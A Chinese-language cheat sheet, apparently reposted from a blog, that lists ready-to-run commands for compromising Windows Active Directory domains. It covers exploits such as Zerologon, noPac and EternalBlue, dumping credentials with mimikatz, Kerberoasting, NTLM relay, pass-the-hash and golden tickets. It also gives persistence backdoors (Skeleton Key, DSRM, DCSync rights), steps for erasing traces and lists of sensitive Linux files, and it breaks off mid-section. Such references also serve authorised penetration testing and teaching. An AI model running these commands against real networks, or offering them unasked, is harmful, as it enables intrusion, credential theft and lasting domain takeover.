来自:https://0range-x.github.io/2022/01/26/Domain-penetration_one-stop/

1.无凭证情况下

网络扫描

  1. cme smb <ip_range> # SMB 扫描存活主机
  2. nmap -sP -p <ip> # ping 扫描
  3. nmap -PN -sV --top-ports 50 --open <ip> # 快速扫描
  4. nmap -PN --script smb-vuln* -p139,445 <ip> # 检测 SMB 漏洞
  5. nmap -PN -sC -sV <ip> # 经典扫描
  6. nmap -PN -sC -sV -p- <ip> # 全扫描
  7. nmap -sU -sC -sV <ip> # UDP 扫描

漏洞快速探测

扫描后可以去先用已知漏洞打

  1. java rmi exploit/multi/misc/java_rmi_server
  2. ms17-010exploit/windows/smb/ms17_010_eternalblue
  3. tomcatauxiliary/scanner/http/tomcat_enum
  4. jboss managerexploit/multi/http/tomcat_mgr_deploy
  5. Java反序列化漏洞测试:ysoserial
  6. 查找产品的CVE漏洞:searchsploit
  7. MS14-025 searchsploit
  8. findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
  9. 爆破数据库连接:use admin/mssql/mssql_enum_sql_logins
  10. proxylogon
  11. proxyshell

提权

低权限可以做的事情

  1. winpeas.exe
  2. 查找内容有 password 的文件:findstr /si 'password' *.txt *.xml *.docx
  3. Juicy Potato / Lovely Potato
  4. PrintSpoofer
  5. RoguePotato
  6. SMBGhost CVE-2020-0796
  7. CVE-2021-36934 (HiveNightmare/SeriousSAM)
  8. ......

拥有本地管理员权限

获取密码

  1. procdump.exe -accepteula -ma lsass.exe lsass.dmp
  2. mimikatz "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords" "exit"
  3. mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"
  4. hashdump: post/windows/gather/smart_hashdump
  5. cme smb <ip_range> -u <user> -p <password> -M lsassy
  6. cme smb <ip_range> -u <user> -p '<password>' --sam / --lsa / --ntds

绕过LSA防护策略读取密码

  1. PPLdump64.exe <lsass.exe|lsass_pid> lsass.dmp
  2. mimikatz "!+" "!processprotect /process:lsass.exe /remove" "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "!processprotect /process:lsass.exe" "!-" #with mimidriver.sys

token窃取

  1. .\incognito.exe list_tokens -u
  2. .\incognito.exe execute -c "<domain>\<user>" powershell.exe
  3. use incognito
  4. impersonate_token <domain>\\<user>

之前粗略分析过 token

Token窃取那些事 (0range-x.github.io)

查看本地存储的所有密码

  1. lazagne.exe all

卷影拷贝(获取域控所有hash)

  1. diskshadow list shadows all
  2. mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
  1. 管理员权限执行
  2. vssadmin create shadow /for=C:
  3. 利用卷影副本卷名拷贝ntds.dit文件与用注册表导出system.hive
  4. copy \\?\GLOBALLROOT\Device\xxxxxxxxxx\windows\ntds\ntds.dit C:\ntds.dit reg sava hklm\system system.hive
  5. //导出system.hive文件到注册表
  6. vssadmin delete shadows /for=C: /quiet //删除卷影,隐藏痕迹

CVE-2020-1472的分析与复现 (0range-x.github.io))

dpapi解密

2.内网信息收集

本机信息收集

  1. 1、用户列表 net user /domain
  2. windows用户列表 分析邮件用户,内网[域]邮件用户,通常就是内网[域]用户
  3. 2.进程列表 tasklist /svc
  4. 分析杀毒软件/安全监控工具等 邮件客户端 VPN ftp
  5. 3.服务列表 tasklist /svc
  6. 与安全防范工具有关服务[判断是否可以手动开关等] 存在问题的服务[权限/漏洞]
  7. 4.端口列表 netstat -ano
  8. 开放端口对应的常见服务/应用程序[匿名/权限/漏洞等] 利用端口进行信息收集
  9. 5.补丁列表 systeminfo
  10. 分析 Windows 补丁 第三方软件[Java/Oracle/Flash 等]漏洞
  11. 6.本机共享 smbclient -L ip
  12. net user \\ip\c$
  13. 本机共享列表/访问权限 本机访问的域共享/访问权限
  14. 7.本用户习惯分析
  15. 历史记录 收藏夹 文档等

8.获取当前用户密码

Windows

Linux

浏览器

Navicat密码

版本:Navicat 11或12

方法:https://blog.csdn.net/CCESARE/article/details/104746596

解密脚本:https://github.com/tianhe1986/FatSmallTools

https://github.com/HyperSine/how-does-navicat-encrypt-password

xshell&xftp密码

https://github.com/dzxs/Xdecrypt

mRemoteNG密码

https://github.com/kmahyyg/mremoteng-decrypt

https://github.com/haseebT/mRemoteNG-Decrypt

扩散信息收集

常用端口扫描工具

  • nmap
  • masscan
  • zmap
  • s扫描器
  • 自写脚本
  • nc
  • ……

内网拓扑架构分析

  • DMZ
  • 管理网
  • 生产网
  • 测试网

常见信息收集命令

ipconfig:

  1. ipconfig /all ------> 查询本机 IP 段,所在域等

net

  1. net user ------> 本机用户列表
  2. net localgroup administrators ------> 本机管理员[通常含有域用户]
  3. net user /domain ------> 查询域用户
  4. net group /domain ------> 查询域里面的工作组
  5. net group "domain admins" /domain ------> 查询域管理员用户组
  6. net localgroup administrators /domain ------> 登录本机的域管理员
  7. net localgroup administrators workgroup\user001 /add ----->域用户添加到本机 net group "Domain controllers" -------> 查看域控制器(如果有多台)
  8. net view ------> 查询同一域内机器列表 net view /domain ------> 查询域列表
  9. net view /domain:domainname

dsquery

  1. dsquery computer domainroot -limit 65535 && net group "domain
  2. computers" /domain ------> 列出该域内所有机器名
  3. dsquery user domainroot -limit 65535 && net user /domain------>列出该域内所有用户名
  4. dsquery subnet ------>列出该域内网段划分
  5. dsquery group && net group /domain ------>列出该域内分组
  6. dsquery ou ------>列出该域内组织单位
  7. dsquery server && net time /domain------>列出该域内域控制器

第三方信息收集

  • NETBIOS 信息收集
  • SMB 信息收集
  • 空会话信息收集
  • 漏洞信息收集等

3.获取域控的方法

SYSVOL

SYSVOL是指存储域公共文件服务器副本的共享文件夹,它们在域中所有的域控制器之间复制。 Sysvol文件夹是安装AD时创建的,它用来存放GPO、Script等信息。同时,存放在Sysvol文件夹中的信息,会复制到域中所有DC上。 相关阅读:

MS14-068 Kerberos
  1. python ms14-068.py -u 域用户@域名 -p 密码 -s 用户SID -d 域主机

利用mimikatz将工具得到的TGT_domainuser@SERVER.COM.ccache写入内存,创建缓存证书:

  1. mimikatz.exe "kerberos::ptc c:TGT_darthsidious@pentest.com.ccache" exit
  2. net use k: \pentest.comc$

相关阅读 :

SPN扫描

Kerberoast可以作为一个有效的方法从Active Directory中以普通用户的身份提取服务帐户凭据,无需向目标系统发送任何数据包。 SPN是服务在使用Kerberos身份验证的网络上的唯一标识符。它由服务类,主机名和端口组成。在使用Kerberos身份验证的网络中,必须在内置计算机帐户(如NetworkService或LocalSystem)或用户帐户下为服务器注册SPN。对于内部帐户,SPN将自动进行注册。但是,如果在域用户帐户下运行服务,则必须为要使用的帐户的手动注册SPN。 SPN扫描的主要好处是,SPN扫描不需要连接到网络上的每个IP来检查服务端口,SPN通过LDAP查询向域控执行服务发现,SPN查询是Kerberos的票据行为一部分,因此比较难检测SPN扫描。 相关阅读 :

Kerberos的黄金门票

在域上抓取的哈希

  1. lsadump::dcsync /domain:pentest.com /user:krbtgt
  2. kerberos::purge
  3. kerberos::golden /admin:administrator /domain:域 /sid:SID /krbtgt:hash
  4. /ticket:adinistrator.kiribi
  5. kerberos::ptt administrator.kiribi
  6. kerberos::tgt
  7. net use k: \pnet use k: \pentest.comc$

相关阅读 :

Kerberos的银票务

黄金票据和白银票据的一些区别: Golden Ticket:伪造TGT,可以获取任何Kerberos服务权限 银票:伪造TGS,只能访问指定的服务 加密方式不同: Golden Ticket由krbtgt的hash加密 Silver Ticket由服务账号(通常为计算机账户)Hash加密 认证流程不同: 金票在使用的过程需要同域控通信 银票在使用的过程不需要同域控通信 相关阅读 :

域服务账号破解

与上面SPN扫描类似的原理 https://github.com/nidem/kerberoast 获取所有用作SPN的帐户

  1. setspn -T PENTEST.com -Q */*

从Mimikatz的RAM中提取获得的门票

  1. kerberos::list /export

用rgsrepcrack破解

  1. tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi

凭证盗窃

从搜集的密码里面找管理员的密码

NTLM relay

用于主动让目标机器发起NTLM请求的方法:

Relay LDAP:

Relay AD CS/PKI:

集成几个利用的工具:

内网445端口转发:

Kerberos委派

地址解析协议

实在搞不定再搞ARP

zerologon漏洞
  1. python3 cve-2020-1472-exploit.py <MACHINE_BIOS_NAME> <ip>
  2. secretsdump.py <DOMAIN>/<MACHINE_BIOS_NAME>\$@<IP> -no-pass -just-dc-user "Administrator"
  3. secretsdump.py -hashes :<HASH_admin> <DOMAIN>/Administrator@<IP>
  4. python3 restorepassword.py -target-ip <IP> <DOMAIN>/<MACHINE_BIOS_NAME>@<MACHINE_BIOS_NAME> -hexpass <HEXPASS>

CVE-2020-1472的分析与复现 (0range-x.github.io)

1、利用Mimikatz check

  1. lsadump::zerologon /target:dc1.exploit.local /account:dc1$

exploit

  1. lsadump::zerologon /target:dc1.exploit.local /account:dc1$ /exploit

dcsync

  1. lsadump::dcsync /dc:dc1.exploit.local /authuser:dc1$ /authdomain:exploit.local /authpassword:"" /domain:exploit.local /authntlm /user:krbtgt

restore

  1. lsadump::postzerologon /target:conttosson.locl /account:dc$

2、利用impacket:

  • 取目标主机名+IP
  • install 修改版本的impacket
  • Exp
  1. python cve-2020-1472-exploit.py DC2008 10.211.55.200

域渗透指北 - 图1

  1. secretsdump.py -no-pass cgdomain.com/'DC2008$'@10.211.55.200 -history -just-dc-user administrator
  2. secretsdump.py -no-pass cgdomain.com/administrator@10.211.55.200 -hashes aad3b435b51404eeaad3b435b51404ee:3add1560657a19b3166247eb3eb149ae

域渗透指北 - 图2

获取到旧的密码明文hex,还原

  1. python restorepassword.py cgdomain.com/DC2008@DC2008 -target-ip 10.211.55.200 -hexpass 59958639cbdd4523de5d42b01adb0e256e0d39aef14c8eef31f4c078862109f253bbb7b3817ab123d013856c028fa4993f5f5b9a830a3a98d87483b29df3fb55082a1f464b19220a2c04f6605d2d321a04afbb551f8f19a13d399f9f5af2aa23c5b76b49001033516fefd90cb0348256e8282b22cbf9e70d82a8b8d2916d578246e288af3af727533d36ad8950fe1c513771377d98a947c4a8eae2b581a74b6687a2e533b7e89e8d03c2e6c2123d519489869a6e33d3a8884be33107060b62e2852502261f48c097ddb68750cc55b7688cc951441cf02989a307f55c008e978edbaf31766d17b53505016c7580cb480b

域渗透指北 - 图3

恢复方法2

通过wmic, pass the hash 拿到域控制器中的本地管理员权限(域管)

  1. wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8adfc85c3490040e942ae1e6c68f645e test.local/Administrator@10.211.55.38

然后分别执行,拷贝本机中SAM数据库到本地

  1. - reg save HKLM\SYSTEM system.save
  2. - reg save HKLM\SAM sam.save
  3. - reg save HKLM\SECURITY security.save
  4. - get system.save
  5. - get sam.save
  6. - get security.save
  7. - del /f system.save
  8. - del /f sam.save
  9. - del /f security.save

提取明文hash

  1. secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

然后恢复。

CVE-2021-42278 && CVE-2021-42287

sam-the-admin

noPac: CVE-2021-42287/CVE-2021-42278

  1. ./noPac.exe -domain dc.com -user username -pass 'password' /dc owa.dc.com
  2. /mAccount mAusername /mPassword password /service cifs /ptt

4.列出可匿名访问的SMB共享

  1. enum4linux -a -u "" -p "" <dc-ip> && enum4linux -a -u "guest" -p "" <dc-ip>
  2. smbmap -u "" -p "" -P 445 -H <dc-ip> && smbmap -u "guest" -p "" -P 445 -H <dc-ip>
  3. smbclient -U '%' -L //<dc-ip> && smbclient -U 'guest%' -L //<dc-ip>
  4. cme smb <ip> -u '' -p '' # 枚举可空Session访问的SMB共享
  5. cme smb <ip> -u 'a' -p '' #枚举可匿名访问的SMB共享

5.枚举LDAP

  1. nmap -n -sV --script "ldap* and not brute" -p 389 <dc-ip>
  2. ldapsearch -x -h <ip> -s base

6.查找用户名

  1. enum4linux -U <dc-ip> | grep 'user:'
  2. crackmapexec smb <ip> -u <user> -p '<password>' --users
  3. nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='<domain>',userdb=<users_list_file>" <ip>
  4. OSINT - 在互联网上寻找用户名

得到账号,但是没有密码

密码喷洒

  1. 获取域密码策略
  2. crackmapexec <IP> -u 'user' -p 'password' --pass-pol
  3. enum4linx -u 'username' -p 'password' -P <IP>
  4. cme smb <dc-ip> -u user.txt -p password.txt --no-bruteforce # 不爆破,只测试单一的 user=password
  5. cme smb <dc-ip> -u user.txt -p password.txt # 交叉爆破,根据密码策略,失败过多可能会被封禁

ASREP-Roasting攻击

获取hash

  1. python GetNPUsers.py <domain>/ -usersfile <usernames.txt> -format hashcat -outputfile <hashes.domain.txt>
  2. Rubeus asreproast /format:hashcat

获取ASREP-Roastable账号

  1. Get-DomainUser -PreauthNotRequired -Properties SamAccountName
  2. MATCH (u:User {dontreqpreauth:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETURN p

拿到任意一个域用户的账号密码

获取其他账户密码

1.获取域内所有账户名

  1. GetADUsers.py -all -dc-ip <dc_ip> <domain>/<username>

2.枚举 SMB 共享

  1. cme smb <ip> -u <user> -p <password> --shares

3.bloodhound

  1. bloodhound-python -d <domain> -u <user> -p <password> -gc <dc> -c all

4.powerview / pywerview

Kerberoasting攻击

获取hash

  1. GetUserSPNs.py -request -dc-ip <dc_ip> <domain>/<user>:<password>
  2. Rubeus kerberoast

查找 kerberoastable 账号

  1. Get-DomainUser -SPN -Properties SamAccountName, ServicePrincipalName
  2. MATCH (u:User {hasspn:true}) RETURN u
  3. MATCH (u:User {hasspn:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETURN p

MS14-068

FindSMB2UPTime.py

  1. rpcclient $> lookupnames <name>
  2. wmic useraccount get name,sid
  3. auxiliary/admin/kerberos/ms14_068_kerberos_checksum
  1. goldenPac.py -dc-ip <dc_ip> <domain>/<user>:'<password>'@<target>
  1. kerberos::ptc "<ticket>"

PrintNightmare

  1. CVE-2021-1675.py <domain>/<user>:<password>@<target> '\\<smb_server_ip>\<share>\inject.dll'

枚举 DNS 服务器

  1. dnstool.py -u 'DOMAIN\user' -p 'password' --record '*' --action query <dc_ip>

7.relay/poisoning攻击

扫描没开启SMB签名的机器

  1. nmap -Pn -sS -T4 --open --script smb-security-mode -p445 ADDRESS/MASK
  2. use exploit/windows/smb/smb_relay
  3. cme smb $hosts --gen-relay-list relay.txt

PetitPotam

  1. PetitPotam.py -d <domain> <listener_ip> <target_ip>

后续可以跟着adcs攻击

监听

  1. responder -i eth0
  2. mitm6 -d <domain>

无SMB签名 || 开启IPv6 || ADCS

1.MS08-068

  1. use exploit/windows/smb/smb_relay #常用于windows2003 / windows server2008
  1. responder -I eth0 # 记得先关闭本机的 smb 和 http 服务
  2. ntlmrelayx.py -tf targets.txt

2.mitm6 -i eth0 -d

  1. ntlmrelayx.py -6 -wh <attacker_ip> -l /tmp -socks -debug
  2. ntlmrelayx.py -6 -wh <attacker_ip> -t smb://<target> -l /tmp -socks -debug
  3. ntlmrelayx.py -t ldaps://<dc_ip> -wh <attacker_ip> --delegate-access
  4. getST.py -spn cifs/<target> <domain>/<netbios_name>\$ -impersonate <user>

3.adcs

  1. ntlmrelayx.py -t http://<dc_ip>/certsrv/certfnsh.asp -debug -smb2support --adcs --template DomainController
  2. Rubeus.exe asktgt /user:<user> /certificate:<base64-certificate> /ptt

拿到hash破解

1.LM

  1. john --format=lm hash.txt
  2. hashcat -m 3000 -a 3 hash.txt

2.NTLM

  1. john --format=nt hash.txt
  2. hashcat -m 1000 -a 3 hash.txt

3.NTLMv1

  1. john --format=netntlm hash.txt
  2. hashcat -m 5500 -a 3 hash.txt

4.NTLMv2

  1. john --format=netntlmv2 hash.txt
  2. hashcat -m 5600 -a 0 hash.txt rockyou.txt

5.Kerberos 5 TGS

  1. john spn.txt --format=krb5tgs --wordlist=rockyou.txt
  2. hashcat -m 13100 -a 0 spn.txt rockyou.txt

6.Kerberos ASREP

  1. hashcat -m 18200 -a 0 AS-REP_roast-hashes rockyou.txt

9.横向移动

1.PTH

  1. psexec.py -hashes ":<hash>" <user>@<ip>
  2. wmiexec.py -hashes ":<hash>" <user>@<ip>
  3. atexec.py -hashes ":<hash>" <user>@<ip> "command"
  4. evil-winrm -i <ip>/<domain> -u <user> -H <hash>
  5. xfreerdp /u:<user> /d:<domain> /pth:<hash> /v:<ip>

2.PTK

  1. python getTGT.py <domain>/<user> -hashes :<hashes>
  2. export KRB5CCNAME=/root/impacket-examples/domain_ticket.ccache
  3. python psexec.py <domain>/<user>@<ip> -k -no-pass
  4. Rubeus asktgt /user:victim /rc4:<rc4value>
  5. Rubeus ptt /ticket:<ticket>
  6. Rubeus createnetonly /program:C:\Windows\System32\[cmd.exe||upnpcont.exe]
  7. Rubeus ptt /luid:0xdeadbeef /ticket:<ticket>

3.非约束委派

获取票据

  1. privilege::debug sekurlsa::tickets /export sekurlsa::tickets /export
  2. Rubeus dump /service:krbtgt /nowrap
  3. Rubeus dump /luid:0xdeadbeef /nowrap

查找非约束委派主机

  1. Get-NetComputer -Unconstrained
  2. Get-DomainComputer -Unconstrained -Properties DnsHostName
  3. MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
  4. MATCH (u:User {owned:true}), (c:Computer {unconstraineddelegation:true}), p=shortestPath((u)-[*1..]->(c)) RETURN p

4.约束委派

获取票据

  1. privilege::debug sekurlsa::tickets /export sekurlsa::tickets /
  2. Rubeus dump /service:krbtgt /nowrap
  3. Rubeus dump /luid:0xdeadbeef /nowrap

查找约束委派主机

  1. Get-DomainComputer -TrustedToAuth -Properties DnsHostName, MSDS-AllowedToDelegateTo
  2. MATCH (c:Computer), (t:Computer), p=((c)-[:AllowedToDelegate]->(t)) RETURN p
  3. MATCH (u:User {owned:true}), (c:Computer {name: "<MYTARGET.FQDN>"}), p=shortestPath((u)-[*1..]->(c)) RETURN p

5.基于资源的约束委派

6.dcsync

  1. lsadump::dcsync /domain:htb.local /user:krbtgt # Administrators, Domain Admins, Enterprise Admins 组下的账户都行

7.打印机 SpoolService 漏洞利用

  1. rpcdump.py <domain>/<user>:<password>@<domain_server> | grep MS-RPRN
  2. printerbug.py '<domain>/<username>:<password>'@<Printer IP> <RESPONDERIP>

8.AD域ACL攻击(aclpwn.py)

  1. GenericAll on User
  2. GenericAll on Group
  3. GenericAll / GenericWrite / Write on Computer
  4. WriteProperty on Group
  5. Self (Self-Membership) on Group
  6. WriteProperty (Self-Membership)
  7. ForceChangePassword
  8. WriteOwner on Group
  9. GenericWrite on User
  10. WriteDACL + WriteOwner

9.获取LAPS管理员密码

  1. Get-LAPSPasswords -DomainController <ip_dc> -Credential <domain>\<login> | Format-Table -AutoSize
  2. foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}}

10.privexchange漏洞

  1. python privexchange.py -ah <attacker_host_or_ip> <exchange_host> -u <user> -d <domain> -p <password>
  2. ntlmrelayx.py -t ldap://<dc_fqdn>--escalate-user <user>

Exchange的利用

11.IPC

  1. net use \\ip\ipc$ "password" /user:"administrator"
  2. net use \\ip\c$ "password" /user:"administrator"

12.其他横移

  1. 1.WSUS服务器数据库注入恶意程序更新 WSUSpendu.ps1 # 需要先拿下 WSUS 更新分发服务器
  2. 2.MSSQL Trusted Links use exploit/windows/mssql/mssql_linkcrawler
  3. 3.GPO Delegation
  4. 4.ADCS

10.权限维持

拿到域控权限

dump ntds.dit 文件

  1. crackmapexec smb 127.0.0.1 -u <user> -p <password> -d <domain> --ntds
  2. secretsdump.py '<domain>/<user>:<pass>'@<ip>
  3. ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
  4. secretsdump.py -ntds ntds_file.dit -system SYSTEM_FILE -hashes lmhash:nthash LOCAL -outputfile ntlm-extract
  5. windows/gather/credentials/domain_hashdump

后门

  1. net group "domain admins" myuser /add /domain
  2. Golden ticket(黄金票据)
  3. Silver Ticket(白银票据)
  4. DSRM 后门:
  5. PowerShell New-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa\” -Name DsrmAdminLogonBehavior -Value 2 -PropertyType DWORD
  6. Skeleton Key
  7. mimikatz "privilege::debug" "misc::skeleton" "exit"
  8. 自定义 SSP DLL
  9. mimikatz "privilege::debug" "misc::memssp" "exit"
  10. C:\Windows\System32\kiwissp.log

域信任关系

子域攻击父域 - SID History版跨域黄金票据

  1. Get-NetGroup -Domain <domain> -GroupName "Enterprise Admins" -FullData|select objectsid
  2. mimikatz lsadump::trust
  3. kerberos::golden /user:Administrator /krbtgt:<HASH_KRBTGT> /domain:<domain> /sid:<user_sid> /sids:<RootDomainSID-519> /ptt

利用域信任密钥获取目标域的权限 - 信任票据

  1. "lsadump::trust /patch"
  2. "lsadump::lsa /patch"
  3. "kerberos::golden /user:Administrator /domain:<domain> /sid:
  4. <domain_SID> /rc4:<trust_key> /service:krbtgt /target:<target_domain> /ticket:
  5. <golden_ticket_path>"

攻击其它林

  1. 利用ptintbugpetipotam漏洞使其它林的DC主动连接到本林的一台无约束委派主机,同时抓取发送过来的TGT,然后即可将它用于dcsync攻击

活动目录持久性技巧

https://adsecurity.org/?p=1929 DS恢复模式密码维护 DSRM密码同步

Windows Server 2008 需要安装KB961320补丁才支持DSRM密码同步,Windows Server 2003不支持DSRM密码同步。KB961320:https://support.microsoft.com/en-us/help/961320/a-feature-is-available-for-windows-server-2008-that-lets-you-synchroni,可参考:[巧用DSRM密码同步将域控权限持久化](http://drops.xmd5.com/static/drops/tips-9297.html)

DCshadow

Security Support Provider

简单的理解为SSP就是一个DLL,用来实现身份认证

  1. privilege::debug
  2. misc::memssp

这样就不需要重启c:/windows/system32可看到新生成的文件kiwissp.log

SID History

SID历史记录允许另一个帐户的访问被有效地克隆到另一个帐户

  1. mimikatz "privilege::debug" "misc::addsid bobafett ADSAdministrator"

AdminSDHolder&SDProp

利用AdminSDHolder&SDProp(重新)获取域管理权限

Dcsync后门

向域成员赋予Dcsync权限

  1. Powerview.ps1
  2. Add-DomainObjectAcl -TargetIdentity "DC=vulntarget,DC=com" -PrincipalIdentity test1 -Rights DCSync -Verbose

在登录了test1域账户的机器上执行Dcsync利用操作

  1. mimikatz "lsadump::dcsync /domain:vulntarget.com /all /csv"

组策略

https://adsecurity.org/?p=2716 策略对象在持久化及横向渗透中的应用

Hook PasswordChangeNotify

http://www.vuln.cn/6812

Kerberoasting后门

域渗透-Kerberoasting

AdminSDHolder

Backdooring AdminSDHolder for Persistence

Delegation

Unconstrained Domain Persistence

证书伪造: pyForgeCert

11.敏感文件

windows

敏感配置文件

  1. C:\boot.ini //查看系统版本
  2. C:\Windows\System32\inetsrv\MetaBase.xml //IIS配置文件
  3. C:\Windows\repair\sam //存储系统初次安装的密码
  4. C:\Program Files\mysql\my.ini //Mysql配置
  5. C:\Program Files\mysql\data\mysql\user.MYD //Mysql root
  6. C:\Windows\php.ini //php配置信息
  7. C:\Windows\my.ini //Mysql配置信息
  8. C:\Windows\win.ini //Windows系统的一个基本系统配置文件

Linux

敏感配置文件

  1. #判断是否在docker容器内
  2. /proc/1/cgroup
  3. # 系统版本
  4. cat /etc/issue
  5. # 内核版本
  6. cat /proc/version
  7. # 账户密码
  8. cat /etc/passwd
  9. cat /etc/shadow
  10. # 环境变量
  11. cat /etc/profile
  12. # 系统应用(命令)
  13. ls -lah/sbin
  14. # 安装应用(命令)
  15. la -lah /usr/bin
  16. # 开机自启
  17. cat /etc/crontab
  18. # history
  19. cat ~/.bash_history
  20. cat ~/.nano_history
  21. cat ~/.atftp_history
  22. cat ~/.mysql_history
  23. cat ~/.php_history
  24. # 网络配置
  25. cat /etc/resolv.conf
  26. cat /etc/networks
  27. cat /etc/network/interfaces
  28. cat /etc/sysconfig/network
  29. cat /etc/host.conf
  30. cat /etc/hosts
  31. cat /etc/dhcpd.conf
  32. # Service配置
  33. cat /etc/apache2/apache2.conf
  34. cat /etc/httpd/conf/httpd.conf
  35. cat /etc/httpd/conf/httpd2.conf
  36. cat /var/apache2/config.inc
  37. cat /usr/local/etc/nginx/nginx.conf
  38. cat /usr/local/nginx/conf/nginx.conf
  39. cat /etc/my.cnf
  40. cat /etc/mysql/my.cnf
  41. cat /var/lib/mysql/mysql/user.MYD
  42. cat /etc/mongod.conf
  43. cat /usr/local/redis/redis.conf
  44. cat /etc/redis/redis.conf
  45. # ftp
  46. cat /etc/proftpd.conf
  47. # mail
  48. cat /var/mail/root
  49. cat /var/spool/mail/root
  50. cat ~/.fetchmailrc
  51. cat /etc/procmailrc
  52. cat ~/.procmailrc
  53. cat /etc/exim/exim.cf
  54. cat /etc/postfix/main.cf
  55. cat /etc/mail/sendmail.mc
  56. cat /usr/share/sendmail/cf/cf/linux.smtp.mc
  57. cat /etc/mail/sendmail.cf
  58. # ssh
  59. cat ~/.ssh/authorized_keys
  60. cat ~/.ssh/identity.pub
  61. cat ~/.ssh/identity
  62. cat ~/.ssh/id_rsa.pub
  63. cat ~/.ssh/id_rsa
  64. cat ~/.ssh/id_dsa.pub
  65. cat ~/.ssh/id_dsa
  66. cat /etc/ssh/ssh_config
  67. cat /etc/ssh/sshd_config
  68. cat /etc/ssh/ssh_host_dsa_key.pub
  69. cat /etc/ssh/ssh_host_dsa_key
  70. cat /etc/ssh/ssh_host_rsa_key.pub
  71. cat /etc/ssh/ssh_host_rsa_key
  72. cat /etc/ssh/ssh_host_key.pub
  73. cat /etc/ssh/ssh_host_key
  74. # log
  75. ls /var/log
  76. cat /etc/httpd/logs/access_log
  77. cat /etc/httpd/logs/access.log
  78. cat /etc/httpd/logs/error_log
  79. cat /etc/httpd/logs/error.log
  80. cat /var/log/apache2/access_log
  81. cat /var/log/apache2/access.log
  82. cat /var/log/apache2/error_log
  83. cat /var/log/apache2/error.log
  84. cat /var/log/apache/access_log
  85. cat /var/log/apache/access.log
  86. cat /var/log/auth.log
  87. cat /var/log/chttp.log
  88. cat /var/log/cups/error_log
  89. cat /var/log/dpkg.log
  90. cat /var/log/faillog
  91. cat /var/log/httpd/access_log
  92. cat /var/log/httpd/access.log
  93. cat /var/log/httpd/error_log
  94. cat /var/log/httpd/error.log
  95. cat /var/log/lastlog
  96. cat /var/log/lighttpd/access.log
  97. cat /var/log/lighttpd/error.log
  98. cat /var/log/lighttpd/lighttpd.access.log
  99. cat /var/log/lighttpd/lighttpd.error.log
  100. cat /var/log/messages
  101. cat /var/log/secure
  102. cat /var/log/syslog
  103. cat /var/log/wtmp
  104. cat /var/log/xferlog
  105. cat /var/log/yum.log
  106. cat /var/run/utmp
  107. cat /var/webmin/miniserv.log
  108. cat /var/www/logs/access_log
  109. cat /var/www/logs/access.log
  110. # proc fuzz
  111. /proc/self/fd/32
  112. /proc/self/fd/33
  113. /proc/self/fd/34
  114. /proc/self/fd/35
  115. /proc/sched_debug
  116. /proc/mounts
  117. /proc/net/arp
  118. /proc/net/route
  119. /proc/net/tcp
  120. /proc/net/udp
  121. /proc/net/fib_trie
  122. /proc/version

12.权限提升

Windows

bypass UAC

常用方法
  • 使用IFileOperation COM接口
  • 使用Wusa.exe的extract选项
  • 远程注入SHELLCODE 到傀儡进程
  • DLL劫持,劫持系统的DLL文件
  • eventvwr.exe and registry hijacking
  • sdclt.exe
  • SilentCleanup
  • wscript.exe
  • cmstp.exe
  • 修改环境变量,劫持高权限.Net程序
  • 修改注册表HKCU\Software\Classes\CLSID,劫持高权限程序
  • 直接提权过UAC
  • ……

常用工具

提权

  • windows内核漏洞提权

检测类:Windows-Exploit-Suggester,WinSystemHelper,wesng

利用类:windows-kernel-exploitsBeRoot

  • 服务提权

数据库服务,ftp服务等

  • WINDOWS错误系统配置
  • 系统服务的错误权限配置漏洞
  • 不安全的注册表权限配置
  • 不安全的文件/文件夹权限配置
  • 计划任务
  • 任意用户以NT AUTHORITY\SYSTEM权限安装msi
  • 提权脚本

PowerUP,ElevateKit

Linux

内核溢出提权

linux-kernel-exploits

计划任务

  1. crontab -l
  2. ls -alh /var/spool/cron
  3. ls -al /etc/ | grep cron
  4. ls -al /etc/cron*
  5. cat /etc/cron*
  6. cat /etc/at.allow
  7. cat /etc/at.deny
  8. cat /etc/cron.allow
  9. cat /etc/cron.deny
  10. cat /etc/crontab
  11. cat /etc/anacrontab
  12. cat /var/spool/cron/crontabs/root

SUID

  1. find / -user root -perm -4000 -print 2>/dev/null
  2. find / -perm -u=s -type f 2>/dev/null
  3. find / -user root -perm -4000 -exec ls -ldb {} \;

寻找可利用bin:https://gtfobins.github.io/

环境变量

  1. cd /tmp
  2. echo “/bin/sh > ps
  3. chmod 777 ps
  4. echo $PATH
  5. export PATH=/tmp:$PATH
  6. cd /home/raj/script
  7. ./shell
  8. whoami

Linux环境变量提权 - 先知社区)

系统服务的错误权限配置漏洞

  1. cat /var/apache2/config.inc
  2. cat /var/lib/mysql/mysql/user.MYD
  3. cat /root/anaconda-ks.cfg

不安全的文件/文件夹权限配置

  1. cat ~/.bash_history
  2. cat ~/.nano_history
  3. cat ~/.atftp_history
  4. cat ~/.mysql_history
  5. cat ~/.php_history

找存储的明文用户名,密码

  1. grep -i user [filename]
  2. grep -i pass [filename]
  3. grep -C 5 "password" [filename]
  4. find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla

13.权限维持

Windows

1、密码记录工具

